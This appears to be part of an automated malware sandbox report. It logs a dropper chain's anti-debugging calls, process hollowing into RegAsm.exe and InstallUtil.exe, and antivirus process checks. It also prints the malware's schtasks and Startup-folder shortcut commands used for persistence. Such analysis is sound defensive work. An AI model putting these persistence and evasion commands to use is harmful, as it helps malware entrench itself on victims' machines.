Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB06F7 SetUnhandledExceptionFilter,	24_2_00CB06F7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00750811
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00753DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00753DF3
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00750594
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007506F7 SetUnhandledExceptionFilter,	27_2_007506F7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043A4FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0043A4FE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004215F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_004215F5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00420C37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_00420C37
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A765 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B2A765
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B1185C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B1185C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B10E9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_02B10E9E

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe

24_2_00C94780

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48A000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11DC008
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DCD008
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E86008

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00609369 LogonUserW,

19_2_00609369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00611AC6 SendInput,keybd_event,

19_2_00611AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006151E2 mouse_event,

19_2_006151E2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_006088CD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00614F1C

Source: Shipment.pif, 0000000B.00000000.2048496532.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2073972138.0000000000666000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GuardTrack.scr	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005D885B cpuid

19_2_005D885B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC688E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6843
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CBC03B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC69B4
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6929
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6C07
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CBC59D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_00CC65A1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_00CC6D2D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6E33
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC6F02
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766843
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0075C03B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0076688E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766929
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	27_2_007669B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766C07
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	27_2_00766D2D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	27_2_007665A1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_0075C59D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766E33
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	27_2_00766F02

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Queries volume information: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe VolumeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Queries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
